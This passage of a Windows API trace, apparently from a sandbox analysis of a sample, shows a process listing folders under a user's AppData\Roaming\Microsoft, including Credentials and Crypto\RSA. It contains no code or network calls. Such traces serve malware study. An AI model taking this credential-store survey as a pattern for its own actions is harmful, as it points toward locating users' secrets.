lpBuffer=0x36ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft", lpFilePart=0x0) returned 0x2c [0221.409] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x36eed0 | out: lpFindFileData=0x36eed0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.409] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.409] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3b3af0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3b3af0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3b3af0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AddIns", cAlternateFileName="")) returned 1 [0221.409] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x285f4ad0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bibliography", cAlternateFileName="BIBLIO~1")) returned 1 [0221.409] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0221.409] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crypto", cAlternateFileName="")) returned 1 [0221.409] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Document Building Blocks", cAlternateFileName="DOCUME~1")) returned 1 [0221.409] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Excel", cAlternateFileName="")) returned 1 [0221.409] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795fff90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfda27f60, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0221.410] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1 [0221.410] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28666ef0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b32ecd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b32ecd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1 [0221.410] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x500531d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5b267fb0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x5b267fb0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook", cAlternateFileName="")) returned 1 [0221.410] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42694660, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x42694660, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x42694660, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof", cAlternateFileName="")) returned 1 [0221.410] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x30b088f0, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x30b088f0, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Protect", cAlternateFileName="")) returned 1 [0221.410] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0221.410] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x21509730, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3e1d8b20, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x3e1d8b20, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0221.410] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x426ba7c0, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UProof", cAlternateFileName="")) returned 1 [0221.410] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0221.410] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x286ff470, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x286ff470, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x286ff470, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word", cAlternateFileName="")) returned 1 [0221.410] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0221.410] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.410] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee90) returned 1 [0221.410] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0f0) returned 1 [0221.410] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\AddIns", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\AddIns", lpFilePart=0x0) returned 0x33 [0221.411] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.411] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\AddIns", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\AddIns", lpFilePart=0x0) returned 0x33 [0221.411] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\AddIns\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3b3af0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3b3af0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3b3af0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.412] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3b3af0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3b3af0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3b3af0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.412] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3b3af0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3b3af0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3b3af0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0221.412] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.412] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.412] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.412] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography", lpFilePart=0x0) returned 0x39 [0221.412] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.412] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography", lpFilePart=0x0) returned 0x39 [0221.413] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x285f4ad0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.464] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x285f4ad0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.464] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2861ac30, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Style", cAlternateFileName="")) returned 1 [0221.464] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2861ac30, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Style", cAlternateFileName="")) returned 0 [0221.464] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.465] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.465] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.465] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Credentials", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Credentials", lpFilePart=0x0) returned 0x38 [0221.465] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.465] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Credentials", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Credentials", lpFilePart=0x0) returned 0x38 [0221.465] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.465] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.466] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0221.466] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.466] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.466] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.466] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Crypto", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Crypto", lpFilePart=0x0) returned 0x33 [0221.466] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.467] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Crypto", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Crypto", lpFilePart=0x0) returned 0x33 [0221.467] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Crypto\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.468] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.468] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 1 [0221.468] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 0 [0221.468] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.468] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.469] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.469] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Document Building Blocks", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Document Building Blocks", lpFilePart=0x0) returned 0x45 [0221.469] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.469] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Document Building Blocks", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Document Building Blocks", lpFilePart=0x0) returned 0x45 [0221.469] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.528] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.528] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0221.528] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 0 [0221.528] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.528] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.528] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.528] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Excel", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Excel", lpFilePart=0x0) returned 0x32 [0221.529] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.529] GetFullPathNameW (in: 